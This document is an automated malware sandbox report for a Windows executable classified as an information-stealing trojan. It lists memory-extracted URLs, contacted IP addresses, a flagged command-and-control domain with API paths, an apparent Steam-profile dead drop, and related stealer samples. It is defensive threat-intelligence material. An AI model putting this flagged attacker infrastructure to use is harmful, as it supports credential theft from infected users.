                                                                                                          https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&aBnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://www.ecosia.org/newtab/BnJxmraqlk.exe, 00000000.00000003.2201474731.0000000003C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://steamcommunity.com/profiles/76561199724331900/inventory/BnJxmraqlk.exe, 00000000.00000003.2200713354.0000000000F20000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brBnJxmraqlk.exe, 00000000.00000003.2268585286.0000000003D3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.csFBnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://store.steampowered.com/privacy_agreement/BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engBnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://sputnik-1985.com/BnJxmraqlk.exe, BnJxmraqlk.exe, 00000000.00000002.2349984104.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2295432665.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2285688248.0000000000F32000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2286149060.0000000000F32000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000002.2350128906.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2349043201.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2305113764.0000000000F22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: malware
                                                                                                                        unknown
                                                                                                                        http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zBnJxmraqlk.exefalse
                                                                                                                          high
                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amBnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://sputnik-1985.com/api298BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                            • Avira URL Cloud: malware
                                                                                                                            unknown
                                                                                                                            https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctaBnJxmraqlk.exe, 00000000.00000003.2279889600.0000000003C18000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280294712.0000000003C18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://store.steampowered.com/about/BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://updates.macrium.com/reflect/blank.asphttp:https://updates.macrium.com/InternetConnectionTimeBnJxmraqlk.exefalse
                                                                                                                                  high
                                                                                                                                  https://steamcommunity.com/my/wishlist/BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://ocsp.sectigo.com0BnJxmraqlk.exefalse
                                                                                                                                        high
                                                                                                                                        https://help.steampowered.com/en/BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://steamcommunity.com/market/BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://store.steampowered.com/news/BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://community.fastly.steamstatic.coBnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=BnJxmraqlk.exe, 00000000.00000003.2201474731.0000000003C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://store.steampowered.com/subscriber_agreement/BnJxmraqlk.exe, 00000000.00000003.2200713354.0000000000F20000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#BnJxmraqlk.exefalse
                                                                                                                                                      high
                                                                                                                                                      https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgBnJxmraqlk.exe, 00000000.00000003.2200713354.0000000000F20000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgBnJxmraqlk.exe, 00000000.00000003.2268991081.0000000003C19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://steamcommunity.com/discussions/BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://sputnik-1985.com/s&BnJxmraqlk.exe, 00000000.00000003.2295432665.0000000000F27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                            unknown
                                                                                                                                                            http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0BnJxmraqlk.exefalse
                                                                                                                                                              high
                                                                                                                                                              https://store.steampowered.com/stats/BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amBnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngBnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&aBnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://store.steampowered.com/steam_refunds/BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://x1.c.lencr.org/0BnJxmraqlk.exe, 00000000.00000003.2267688023.0000000003C60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://x1.i.lencr.org/0BnJxmraqlk.exe, 00000000.00000003.2267688023.0000000003C60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchBnJxmraqlk.exe, 00000000.00000003.2201474731.0000000003C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aBnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://sputnik-1985.com/s6BnJxmraqlk.exe, 00000000.00000002.2350128906.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2305113764.0000000000F22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://community.fastly.steamstatiBnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=eBnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://steamcommunity.com/workshop/BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://support.mozilla.org/products/firefoxgro.allBnJxmraqlk.exe, 00000000.00000003.2268585286.0000000003D3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_cBnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://store.steampowered.com/legal/BnJxmraqlk.exe, 00000000.00000003.2200713354.0000000000F20000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://community.fastlBnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://www.mozilla.orBnJxmraqlk.exe, 00000000.00000003.2268516884.0000000003C5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&amp;l=enBnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&amp;l=engBnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://sectigo.com/CPS0BnJxmraqlk.exefalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://updates.macrium.com/reflect/v8/languages/get.asp?lang=%s&major=%d&minor=%d&build=%dhttp:httpBnJxmraqlk.exefalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoBnJxmraqlk.exe, 00000000.00000003.2201474731.0000000003C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://sputnik-1985.com/apilaVBnJxmraqlk.exe, 00000000.00000003.2279889600.0000000003C1A000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280425614.0000000003C1F000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280294712.0000000003C1A000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.BnJxmraqlk.exe, 00000000.00000003.2268991081.0000000003C19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&amp;l=english&aBnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&amp;l=englBnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#BnJxmraqlk.exefalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://store.steampowered.com/BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&amp;l=eBnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.cssBnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                                          • 75% < No. of IPs
                                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                          104.21.48.1
                                                                                                                                                                                                                          sputnik-1985.comUnited States
                                                                                                                                                                                                                          13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                          104.102.49.254
                                                                                                                                                                                                                          steamcommunity.comUnited States
                                                                                                                                                                                                                          16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                          Analysis ID:1585281
                                                                                                                                                                                                                          Start date and time:2025-01-07 13:16:05 +01:00
                                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                          Overall analysis duration:0h 5m 48s
                                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                          Number of analysed new started processes analysed:10
                                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                                          Sample name:BnJxmraqlk.exe
                                                                                                                                                                                                                          renamed because original name is a hash value
                                                                                                                                                                                                                          Original Sample Name:356bde316f31cfc2ed244a7cdd359617.exe
                                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@1/0@11/2
                                                                                                                                                                                                                          EGA Information:Failed
                                                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                                                          • Number of executed functions: 0
                                                                                                                                                                                                                          • Number of non-executed functions: 0
                                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212, 2.23.227.202
                                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                          • Execution Graph export aborted for target BnJxmraqlk.exe, PID 612 because there are no executed function
                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                                          07:17:02API Interceptor9x Sleep call for process: BnJxmraqlk.exe modified
                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          104.21.48.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                                                                                                                          • twirpx.org/administrator/index.php
                                                                                                                                                                                                                          SN500, SN150 Spec.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                          • www.antipromil.site/7ykh/
                                                                                                                                                                                                                          104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                                          • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                                                                                                                                                                          http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • www.valvesoftware.com/legal.htm
                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          sputnik-1985.comfile.exeGet hashmaliciousAmadey, Babadeda, LummaC Stealer, Poverty Stealer, PureLog StealerBrowse
                                                                                                                                                                                                                          • 104.21.96.1
                                                                                                                                                                                                                          NjFiIQNSid.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.112.1
                                                                                                                                                                                                                          steamcommunity.comfile.exeGet hashmaliciousAmadey, Babadeda, LummaC Stealer, Poverty Stealer, PureLog StealerBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          NjFiIQNSid.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          ZxSWvC0Tz7.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          176.113.115.170.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          KRNL.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          OXoeX1Ii3x.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          OXoeX1Ii3x.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          CLOUDFLARENETUShttps://rebrand.ly/3d446fGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                          • 104.26.5.15
                                                                                                                                                                                                                          DHL DOCS 2-0106-25.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                          • 172.67.148.216
                                                                                                                                                                                                                          Sales Acknowledgement - HES #982323.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.16.123.96
                                                                                                                                                                                                                          https://docs.google.com/presentation/d/e/2PACX-1vT2PGn0zBbaptqxmzd37o4wD_789vdOk0IyvB9NJB93qGFh_af8Du5RuZX0G1lsycIP1UzhONEj31sn/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.17.25.14
                                                                                                                                                                                                                          file_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 172.64.149.23
                                                                                                                                                                                                                          Mansourbank Swift-TT379733 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                                                                                                                                          • 172.64.41.3
                                                                                                                                                                                                                          Mansourbank Swift-TT680169 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                                                                                                                                          • 104.18.186.31
                                                                                                                                                                                                                          https://e.trustifi.com/#/fff2a0/615048/6b9108/bb6bb8/0c4d40/10c266/f490c9/97ed1b/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/85de28/9434d8/86c8f5/bcad02/214fc7/998ea3/f74550/f15e41/328dbb/f2d014/49d879/3689f7/91b4f6/9617cd/897401/851960/993266/280340/ae6054/337b49/6f0428/673840/abdb07/82b8be/00f4e1/3270c4/922952/b4db4e/e9dcee/3a01c5/962a76/930521/2e7fc6/514759/a95ca8/c37226/be9e63/3c4ec2/89148e/13fdfe/ea86c0/04048b/56ab74/dca15f/97696c/fa7912/512e28/fc9f59/50d13f/4f0114/039a8f/84bd72/2603b6/e0eceb/28f211/4fdb34/a1dc16/2076ef/8e55cf/8f9d2c/0d4402/f5a713/43ec64/fabda1/b6994c/da2da1/2851a8/b04ed3/8cea9a/1e21dc/0abaf5/7df73e/f39a96/1f2244/423c00/5c4e8dGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                          • 104.17.25.14
                                                                                                                                                                                                                          PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                          • 104.21.18.171
